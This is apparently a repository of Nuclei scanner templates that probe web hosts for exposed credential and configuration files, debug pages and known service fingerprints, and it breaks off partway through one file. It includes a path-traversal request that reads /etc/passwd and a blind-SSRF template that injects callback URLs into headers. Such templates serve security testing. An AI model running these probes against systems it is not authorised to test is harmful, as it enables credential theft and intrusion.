├── .github ├── funding.yml └── workflows │ └── syntax-checking.yml ├── SECURITY.md ├── x-hacker.yaml ├── missing-csp.yaml ├── display-via-header.yaml ├── php-ini.yaml ├── tor-socks-proxy.yaml ├── fps-config.yaml ├── pi-hole-detect.yaml ├── htpasswd-detection.yaml ├── php-fpm-status.yaml ├── .yamllint ├── npmrc.yaml ├── zeroshell-kerbynet-lfd.yaml ├── kong-detect.yaml ├── tox-ini.yaml ├── terraform-detect.yaml ├── elasticsearch-cluster-health.yaml ├── redis-conf.yaml ├── header-blind-ssrf.yaml ├── google-floc-disabled.yaml ├── vernemq-status.yaml ├── circleci-ssh-config.yaml ├── detect-rsyncd.yaml ├── git-credentials.yaml ├── goliath-detect.yaml ├── lucee-detect.yaml ├── php-user-ini.yaml ├── circleci-config.yaml ├── ws-config.yaml ├── django-debug.yaml ├── magento-config.yaml ├── nginx-vhost-traffic-status.yaml ├── rails-secret-token.yaml ├── mrtg-detect.yaml ├── detect-drone.yaml ├── comtrend-ct5367-remote-root.yaml ├── redmine-cli-detect.yaml ├── s3cfg.yaml ├── dbeaver-data-sources.yaml ├── dockercfg.yaml ├── homeworks-illumination-web-keypad.yaml ├── ssh-known-hosts.yaml ├── eyelock-nano-lfd.yaml ├── pagespeed-global-admin.yaml ├── salesforce-login.yaml ├── swagger-xss.yaml ├── ventrilo-config.yaml ├── CVE-2018-3167.yaml ├── ssh-authorized-keys.yaml ├── circarlife-default-login.yaml ├── ganglia-xml-grid-monitor.yaml ├── CVE-2019-0230.yaml ├── pmb-directory-traversal.yaml ├── tectuus-scada-monitor.yaml ├── esmtprc.yaml ├── lutron-iot-default-login.yaml ├── ftpconfig.yaml ├── sftp-config.yaml ├── CVE-2021-33904.yaml ├── CVE-2018-2894.yaml ├── gmail-api-client-secrets.yaml ├── selea-ip-camera.yaml ├── CVE-2014-2323.yaml ├── pyramid-debug-toolbar.yaml ├── redmine-db-config.yaml ├── CVE-2017-16806.yaml ├── avtech-dvr-exposure.yaml ├── jetty-information-disclosure.yaml ├── zwave2mqtt-health-check.yaml ├── CVE-2018-11784.yaml ├── CVE-2021-26475.yaml ├── config-file.yaml ├── django-secret.key.yaml ├── php-timeclock-xss.yaml ├── robomongo.yaml ├── CVE-2018-16670.yaml 
├── CVE-2009-0545.yaml ├── CVE-2018-12634.yaml ├── CVE-2021-31581.yaml ├── dbeaver-credentials.yaml ├── remote-sync.yaml ├── CVE-2018-16668.yaml ├── CVE-2020-22840.yaml ├── CVE-2020-29164.yaml ├── chamilo-lms-xss.yaml ├── laravel-telescope.yaml ├── openstack-user-secrets.yaml ├── cacti-detect.yaml ├── node-nunjucks-ssti.yaml ├── CVE-2020-24949.yaml ├── huawei-dg8045-auth-bypass.yaml ├── upnp-device.yaml ├── vscode-sftp.yaml ├── detect-tracer-sc-web.yaml ├── CVE-2018-16671.yaml ├── CVE-2020-23517.yaml ├── firebase-config.yaml ├── sftp-deployment-config.yaml ├── CVE-2020-25540.yaml ├── CVE-2021-24286.yaml ├── couchbase-buckets-rest-api.yaml ├── detect-dns-over-https.yaml ├── putty-user-keyfile.yaml ├── CVE-2021-28937.yaml ├── CVE-2021-29622.yaml ├── prtg-detect.yaml ├── production-logs.yaml ├── solar-log-500.yaml ├── CVE-2021-3374.yaml ├── detect-workerman-websocket-server.yaml ├── CVE-2009-4223.yaml ├── jetbrains-webservers-xml.yaml ├── landfill-remote-monitoring-control.yaml ├── CVE-2019-15859.yaml ├── CVE-2021-32820.yaml ├── CVE-2007-0885.yaml ├── spidercontrol-scada-server-info.yaml ├── monitorix-exposure.yaml ├── old-copyright.yaml ├── yii-debugger.yaml ├── blind-xxe.yaml ├── viewlinc-crlf-injection.yaml ├── CVE-2016-0957.yaml ├── apache-filename-brute-force.yaml ├── git-mailmap.yaml ├── CVE-2021-31800.yaml ├── header-command-injection.yaml ├── CVE-2020-19625.yaml ├── db-schema.yaml ├── CVE-2021-31537.yaml ├── CVE-2014-2321.yaml ├── darkstat-detect.yaml ├── netgear-router-disclosure.yaml ├── CVE-2020-13379.yaml ├── CVE-2021-27132.yaml ├── CVE-2021-31250.yaml ├── development-logs.yaml ├── sony-bravia-disclosure.yaml ├── beward-ipcamera-disclosure.yaml ├── CVE-2015-6477.yaml ├── CVE-2021-3377.yaml ├── netrc.yaml ├── CVE-2021-31249.yaml ├── public-documents.yaml ├── CVE-2020-9402.yaml ├── routes-ini.yaml ├── LICENSE ├── squid-analysis-report-generator.yaml ├── CVE-2018-1000600.yaml ├── rpcbind-portmapper.yaml ├── CVE-2021-24291.yaml ├── CVE-2021-33221.yaml ├── 
server-private-keys.yaml ├── xmlrpc-pingback-ssrf.yaml ├── ssrf-by-proxy.yaml ├── fuzz-oauth.yaml ├── application-ini.yaml ├── CVE-2017-15715.yaml ├── keys-js.yaml ├── auth-js.yaml ├── header-blind-sql-injection.yaml ├── config-js.yaml ├── CVE-2013-4786.yaml ├── oauth-state-bypass.yaml ├── kubernetes-api-exposure.yaml ├── dom-xss.yaml ├── http2-request-smuggling.yaml ├── CVE-2020-36112.yaml ├── container-escape-detection.yaml ├── .gitignore ├── websocket-upgrade-oob.yaml ├── tls-pqc-downgrade-attack.yaml ├── ssti-polyglot-multi-engine-oob.yaml ├── CVE-2017-17562.yaml ├── websocket-relay-oob.yaml ├── php-config-backup-exposure.yaml ├── jwt-algorithm-confusion.yaml ├── websocket-auth-bypass-oob.yaml ├── sensitive-config-exposure.yaml ├── websocket-origin-bypass-oob.yaml ├── graphql-depth-bomb.yaml ├── websocket-auth-bypass-real.yaml ├── websocket-subscription-oob.yaml ├── http3-protocol-downgrade-attack.yaml ├── graphql-subscription-oob.yaml └── http3-quic-smuggling.yaml /.github/funding.yml: -------------------------------------------------------------------------------- 1 | github: geeknik 2 | custom: https://buymeacoffee.com/geeknik 3 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | The purpose of this file is to silence the GitHub warning about missing security policy files. 
2 | -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: YAML Lint 2 | 3 | on: [push] 4 | 5 | jobs: 6 | lintAllTheThings: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: actions/checkout@v1 10 | - name: yaml-lint 11 | uses: ibiqlik/action-yamllint@v3 12 | -------------------------------------------------------------------------------- /x-hacker.yaml: -------------------------------------------------------------------------------- 1 | id: x-hacker 2 | 3 | info: 4 | name: Displays the X-Hacker server header if defined 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | extractors: 14 | - type: regex 15 | part: header 16 | name: x-hacker 17 | regex: 18 | - '(?i)X-Hacker:.*' 19 | -------------------------------------------------------------------------------- /missing-csp.yaml: -------------------------------------------------------------------------------- 1 | id: missing-csp 2 | info: 3 | name: CSP Not Enforced 4 | author: geeknik 5 | severity: info 6 | description: Checks if there is a CSP header 7 | tags: misc 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | redirects: true 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - '!contains(tolower(all_headers), ''content-security-policy'')' 18 | -------------------------------------------------------------------------------- /display-via-header.yaml: -------------------------------------------------------------------------------- 1 | id: display-via-header 2 | 3 | info: 4 | name: Display Via Header 5 | author: geeknik 6 | reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via 7 | severity: info 8 | tags: misc 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | redirects: true 16 | extractors: 17 | - type: regex 18 | part: header 
19 | regex: 20 | - "Via:.*" 21 | -------------------------------------------------------------------------------- /php-ini.yaml: -------------------------------------------------------------------------------- 1 | id: php-ini 2 | 3 | info: 4 | name: php.ini 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/php.ini" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "[PHP]" 21 | - "short_open_tag" 22 | - "safe_mode" 23 | - "expose_php" 24 | condition: and 25 | -------------------------------------------------------------------------------- /tor-socks-proxy.yaml: -------------------------------------------------------------------------------- 1 | id: tor-socks-proxy 2 | info: 3 | name: Detect tor SOCKS proxy 4 | author: geeknik 5 | severity: info 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}' 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - "This is a SOCKS Proxy" 17 | - "HTTPTunnelPort" 18 | - "SOCKSPort" 19 | condition: and 20 | - type: status 21 | status: 22 | - 501 23 | -------------------------------------------------------------------------------- /fps-config.yaml: -------------------------------------------------------------------------------- 1 | id: fps-config 2 | 3 | info: 4 | name: FrontPage Server Config Exposure 5 | author: nullenc0de 6 | severity: critical 7 | description: FrontPage Server Config Exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_vti_pvt/service.pwd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "# -FrontPage-" 22 | part: body 23 | -------------------------------------------------------------------------------- /pi-hole-detect.yaml: -------------------------------------------------------------------------------- 1 | id: pi-hole-detect 2 | 
info: 3 | name: pi-hole detector 4 | author: geeknik 5 | severity: info 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/admin/index.php" 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: status 15 | status: 16 | - 200 17 | - type: word 18 | words: 19 | - "Pi-hole" 20 | - "Web Interface" 21 | - "FTL" 22 | part: body 23 | condition: and 24 | -------------------------------------------------------------------------------- /htpasswd-detection.yaml: -------------------------------------------------------------------------------- 1 | id: htpasswd 2 | 3 | info: 4 | name: Detect exposed .htpasswd files 5 | author: geeknik 6 | severity: info 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.htpasswd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - ":{SHA}" 19 | - ":$apr1$" 20 | - ":$2y$" 21 | condition: or 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /php-fpm-status.yaml: -------------------------------------------------------------------------------- 1 | id: php-fpm-status 2 | 3 | info: 4 | name: PHP-FPM Status 5 | author: geeknik 6 | severity: info 7 | tags: config 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/status?full" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'pool:' 19 | - 'process manager:' 20 | - 'start time:' 21 | - 'pid:' 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | ignore: | 5 | .pre-commit-config.yml 6 | .github/ 7 | .git/ 8 | *.yml 9 | 10 | rules: 11 | document-start: disable 12 | comments-indentation: disable 13 | line-length: disable 14 | new-lines: disable 15 | 
new-line-at-end-of-file: disable 16 | truthy: disable 17 | comments: 18 | require-starting-space: true 19 | ignore-shebangs: true 20 | min-spaces-from-content: 1 21 | empty-lines: 22 | max: 5 23 | braces: 24 | forbid: true 25 | brackets: 26 | forbid: true 27 | -------------------------------------------------------------------------------- /npmrc.yaml: -------------------------------------------------------------------------------- 1 | id: npmrc 2 | 3 | info: 4 | name: Detect .npmrc 5 | author: geeknik 6 | description: npm registry authentication data 7 | severity: high 8 | tags: npm,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.npmrc" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: header 18 | words: 19 | - "text/plain" 20 | - type: word 21 | words: 22 | - "_auth=" 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /zeroshell-kerbynet-lfd.yaml: -------------------------------------------------------------------------------- 1 | id: zeroshell-kerbynet-lfd 2 | 3 | info: 4 | name: ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure 5 | author: geeknik 6 | reference: https://www.exploit-db.com/exploits/28558 7 | severity: high 8 | tags: zeroshell,kerbynet,lfd 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../etc/passwd" 14 | 15 | matchers: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "root:[x*]:0:0:" 20 | -------------------------------------------------------------------------------- /kong-detect.yaml: -------------------------------------------------------------------------------- 1 | id: kong-detect 2 | info: 3 | name: Detect Kong 4 | author: geeknik 5 | description: The Cloud-Native API Gateway - https://github.com/Kong/kong 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers-condition: 
and 14 | matchers: 15 | 16 | - type: regex 17 | part: header 18 | regex: 19 | - "[Ss]erver: [Kk]ong+" 20 | 21 | extractors: 22 | - type: kval 23 | part: header 24 | kval: 25 | - server 26 | -------------------------------------------------------------------------------- /tox-ini.yaml: -------------------------------------------------------------------------------- 1 | id: tox-ini 2 | 3 | info: 4 | name: Detect tox.ini 5 | author: geeknik 6 | reference: https://tox.readthedocs.io/en/latest/config.html 7 | severity: high 8 | tags: tox,config,aws,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/tox.ini" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "AWS_ACCESS_KEY_ID" 20 | - "AWS_SECRET_ACCESS_KEY" 21 | condition: and 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /terraform-detect.yaml: -------------------------------------------------------------------------------- 1 | id: terraform-detect 2 | info: 3 | name: Detect Terraform Provider 4 | author: geeknik 5 | description: Write Infrastructure as Code - https://www.terraform.io/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/provider.tf" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - access_key 19 | - terraform 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /elasticsearch-cluster-health.yaml: -------------------------------------------------------------------------------- 1 | id: elasticsearch-cluster-health 2 | 3 | info: 4 | name: ElasticSearch Cluster Health 5 | author: geeknik 6 | severity: low 7 | tags: elasticsearch 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_cluster/health?pretty" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: 
status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - '"cluster_name" :' 22 | - '"status" :' 23 | - '"timed_out" :' 24 | condition: and 25 | -------------------------------------------------------------------------------- /redis-conf.yaml: -------------------------------------------------------------------------------- 1 | id: redis-conf 2 | 3 | info: 4 | name: Redis Configuration File 5 | author: geeknik 6 | description: 7 | severity: high 8 | tags: redis,config 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/redis.conf" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Redis configuration file example" 20 | - "INCLUDES" 21 | - "MODULES" 22 | - "NETWORK" 23 | condition: and 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /header-blind-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: header-blind-ssrf 2 | 3 | info: 4 | name: Header Blind SSRF 5 | author: geeknik 6 | severity: high 7 | description: Checks for blind SSRF via popular browser headers. 8 | 9 | requests: 10 | - payloads: 11 | header: helpers/payloads/request-headers.txt 12 | 13 | raw: 14 | - | 15 | GET /?§header§ HTTP/1.1 16 | Host: {{Hostname}} 17 | §header§: {{interactsh-url}} 18 | Connection: close 19 | 20 | matchers: 21 | - type: word 22 | part: interactsh_protocol 23 | words: 24 | - "http" 25 | -------------------------------------------------------------------------------- /google-floc-disabled.yaml: -------------------------------------------------------------------------------- 1 | id: google-floc-disabled 2 | 3 | info: 4 | name: Google FLoC Disabled 5 | author: geeknik 6 | description: The detected website has decided to explicitly exclude itself from Google FLoC tracking. 
7 | reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ 8 | severity: info 9 | tags: google,floc 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "interest-cohort=()" 21 | -------------------------------------------------------------------------------- /vernemq-status.yaml: -------------------------------------------------------------------------------- 1 | id: vernemq-status 2 | 3 | info: 4 | name: VerneMQ Status Check 5 | reference: 6 | - https://github.com/vernemq/vernemq 7 | author: geeknik 8 | severity: info 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/status" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "VerneMQ Status" 23 | - "Issues" 24 | - "Cluster Overview" 25 | - "Node Status" 26 | condition: and 27 | -------------------------------------------------------------------------------- /circleci-ssh-config.yaml: -------------------------------------------------------------------------------- 1 | id: circleci-ssh-config 2 | 3 | info: 4 | name: circleci ssh-config exposure 5 | author: geeknik 6 | severity: low 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | redirects: true 12 | max-redirects: 3 13 | path: 14 | - "{{BaseURL}}/.circleci/ssh-config" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Host" 21 | - "HostName" 22 | - "IdentityFile" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /detect-rsyncd.yaml: -------------------------------------------------------------------------------- 1 | id: detect-rsyncd 2 | 3 | info: 4 | name: Detect rsyncd 5 | reference: https://linux.die.net/man/1/rsync 6 | author: geeknik 7 | severity: info 8 
| tags: network,rsyncd 9 | 10 | network: 11 | - inputs: 12 | - data: "?\r\n" 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Hostname}}:873" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "RSYNCD: " 22 | - "ERROR: protocol startup error" 23 | condition: and 24 | extractors: 25 | - type: regex 26 | regex: 27 | - 'RSYNCD: \d\d.\d' 28 | -------------------------------------------------------------------------------- /git-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: git-credentials 2 | 3 | info: 4 | name: Github Authentication Dotfile 5 | author: geeknik 6 | severity: high 7 | tags: github,auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.git-credentials" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: header 18 | words: 19 | - "text/plain" 20 | - type: word 21 | words: 22 | - "https://" 23 | - "@github.com" 24 | condition: and 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /goliath-detect.yaml: -------------------------------------------------------------------------------- 1 | id: goliath-detect 2 | 3 | info: 4 | name: Detect Goliath 5 | author: geeknik 6 | description: Goliath is a non-blocking Ruby web server framework -- https://github.com/postrank-labs/goliath 7 | severity: info 8 | tags: goliath 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | 18 | - type: regex 19 | part: header 20 | regex: 21 | - Goliath+ 22 | 23 | extractors: 24 | - type: kval 25 | part: header 26 | kval: 27 | - Server 28 | -------------------------------------------------------------------------------- /lucee-detect.yaml: -------------------------------------------------------------------------------- 1 | id: lucee-detect 2 | info: 3 | name: Detect Lucee 4 | author: geeknik 5 | description: Lucee Server is a 
dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers: 14 | 15 | - type: regex 16 | part: header 17 | regex: 18 | - "(?i)X-Lucee-Version" 19 | - "(?i)X-CB-Server: LUCEE" 20 | - "(?i)X-IDG-Appserver: Lucee" 21 | condition: or 22 | -------------------------------------------------------------------------------- /php-user-ini.yaml: -------------------------------------------------------------------------------- 1 | id: php-user-ini 2 | 3 | info: 4 | name: PHP .user.ini Disclosure 5 | author: geeknik 6 | reference: https://www.php.net/manual/en/configuration.file.per-user.php 7 | severity: low 8 | tags: php 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.user.ini" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "text/plain" 23 | part: header 24 | 25 | - type: dsl 26 | dsl: 27 | - "len(body) > 50" 28 | -------------------------------------------------------------------------------- /circleci-config.yaml: -------------------------------------------------------------------------------- 1 | id: circleci-config 2 | 3 | info: 4 | name: circleci config.yml exposure 5 | author: geeknik 6 | severity: low 7 | reference: https://circleci.com/docs/2.0/sample-config/ 8 | tags: config,exposure 9 | 10 | requests: 11 | - method: GET 12 | redirects: true 13 | max-redirects: 3 14 | path: 15 | - "{{BaseURL}}/.circleci/config.yml" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: dsl 20 | dsl: 21 | - 'regex("^version: ", body) && contains(body, "jobs:")' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /ws-config.yaml: -------------------------------------------------------------------------------- 1 | id: 
ws-config 2 | 3 | info: 4 | name: Websheets Config 5 | author: geeknik 6 | reference: https://github.com/daveagp/websheets 7 | severity: high 8 | tags: websheets,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ws-config.json" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "application/json" 21 | - type: word 22 | words: 23 | - "db-user" 24 | - "db-password" 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /django-debug.yaml: -------------------------------------------------------------------------------- 1 | id: django-debug 2 | 3 | info: 4 | name: Django Debug Exposure 5 | author: geeknik 6 | reference: https://twitter.com/Alra3ees/status/1397660633928286208 7 | severity: high 8 | tags: django 9 | 10 | requests: 11 | - method: POST 12 | path: 13 | - "{{BaseURL}}/admin/login/?next=/admin/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 500 20 | - type: word 21 | part: body 22 | words: 23 | - "DB_HOST" 24 | - "DB_NAME" 25 | - "DJANGO" 26 | condition: and 27 | -------------------------------------------------------------------------------- /magento-config.yaml: -------------------------------------------------------------------------------- 1 | id: magento-config 2 | info: 3 | name: Magento Config Disclosure 4 | author: geeknik 5 | severity: medium 6 | tags: config,exposure 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/app/etc/local.xml" 12 | - "{{BaseURL}}/store/app/etc/local.xml" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "text/xml" 23 | part: header 24 | 25 | - type: word 26 | words: 27 | - "Magento" 28 | part: body -------------------------------------------------------------------------------- /nginx-vhost-traffic-status.yaml: 
-------------------------------------------------------------------------------- 1 | id: nginx-vhost-traffic-status 2 | 3 | info: 4 | name: Nginx Vhost Traffic Status 5 | author: geeknik 6 | reference: https://github.com/vozlt/nginx-module-vts 7 | severity: low 8 | tags: status,nginx,misconfig 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/status" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Nginx Vhost Traffic Status" 20 | - "Host" 21 | - "Zone" 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /rails-secret-token.yaml: -------------------------------------------------------------------------------- 1 | id: rails-secret-token 2 | 3 | info: 4 | name: Rails Secret Token 5 | author: geeknik 6 | severity: high 7 | tags: config,auth,api 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/config/initializers/secret_token.rb" 13 | - "{{BaseURL}}/config/secrets.yml" 14 | - "{{BaseURL}}/.secrets" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "secret_key_base =" 21 | - "config.secret_token =" 22 | condition: or 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /mrtg-detect.yaml: -------------------------------------------------------------------------------- 1 | id: mrtg-detect 2 | info: 3 | name: Detect MRTG 4 | author: geeknik 5 | description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | - "{{BaseURL}}/mrtg/" 13 | - "{{BaseURL}}/MRTG/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | part: body 22 | words: 23 | - "MRTG Index Page" 24 | - "Multi Router Traffic Grapher" 25 | condition: and 26 | 
-------------------------------------------------------------------------------- /detect-drone.yaml: -------------------------------------------------------------------------------- 1 | id: detect-drone-config 2 | 3 | info: 4 | name: Detect Drone Configuration 5 | author: geeknik 6 | description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone 7 | severity: high 8 | tags: config,exposure,drone 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.drone.yml" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "kind:" 20 | - "name:" 21 | - "steps:" 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /comtrend-ct5367-remote-root.yaml: -------------------------------------------------------------------------------- 1 | id: comtrend-ct5367-remote-root 2 | 3 | info: 4 | name: COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root 5 | author: geeknik 6 | reference: https://www.exploit-db.com/exploits/16275 7 | severity: high 8 | tags: comtrend,router,vivacom,iot,disclosure 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/password.cgi" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: regex 21 | regex: 22 | - "pwdAdmin" 23 | - "pwdSupport" 24 | - "pwdUser" 25 | -------------------------------------------------------------------------------- /redmine-cli-detect.yaml: -------------------------------------------------------------------------------- 1 | id: redmine-cli-detect 2 | info: 3 | name: Detect Redmine CLI Configuration File 4 | author: geeknik 5 | description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.redmine-cli" 12 | 13 | matchers-condition: and 14 | matchers: 
15 | - type: word 16 | part: body 17 | words: 18 | - default 19 | - my_id 20 | - root_url 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /s3cfg.yaml: -------------------------------------------------------------------------------- 1 | id: s3cfg 2 | 3 | info: 4 | name: Detect .s3cfg 5 | author: geeknik 6 | description: Amazon S3 Authentication 7 | severity: high 8 | tags: amazon,s3,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.s3cfg" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: word 22 | words: 23 | - "access_key" 24 | - "bucket_location" 25 | - "secret_key" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /dbeaver-data-sources.yaml: -------------------------------------------------------------------------------- 1 | id: dbeaver-data-sources 2 | 3 | info: 4 | name: DBeaver Data Sources 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.dbeaver/data-sources.json" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "application/json" 21 | part: header 22 | - type: word 23 | words: 24 | - '"connection-types": {' 25 | - '"connections": {' 26 | - '"folders": {' 27 | condition: and 28 | -------------------------------------------------------------------------------- /dockercfg.yaml: -------------------------------------------------------------------------------- 1 | id: dockercfg 2 | 3 | info: 4 | name: Detect .dockercfg 5 | author: geeknik 6 | description: Docker registry authentication data 7 | severity: high 8 | tags: docker,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.dockercfg" 14 | 15 | 
matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "text/plain" 21 | - type: word 22 | words: 23 | - "https" 24 | - "email" 25 | - "auth" 26 | condition: and 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /homeworks-illumination-web-keypad.yaml: -------------------------------------------------------------------------------- 1 | id: homeworks-illumination-web-keypad 2 | 3 | info: 4 | name: Web Keypad for Lutron HomeWorks Illumination 5 | reference: https://www.lutron.com 6 | author: geeknik 7 | severity: high 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "HomeWorks Illumination Web Keypad" 19 | - "lutron.js" 20 | - "Lutron HomeWorks" 21 | - "Lutron Electronics, Inc." 22 | condition: and 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /ssh-known-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: ssh-known-hosts 2 | 3 | info: 4 | name: SSH Known Hosts 5 | author: geeknik 6 | reference: https://datacadamia.com/ssh/known_hosts 7 | severity: low 8 | tags: config,exposure,ssh 9 | 10 | requests: 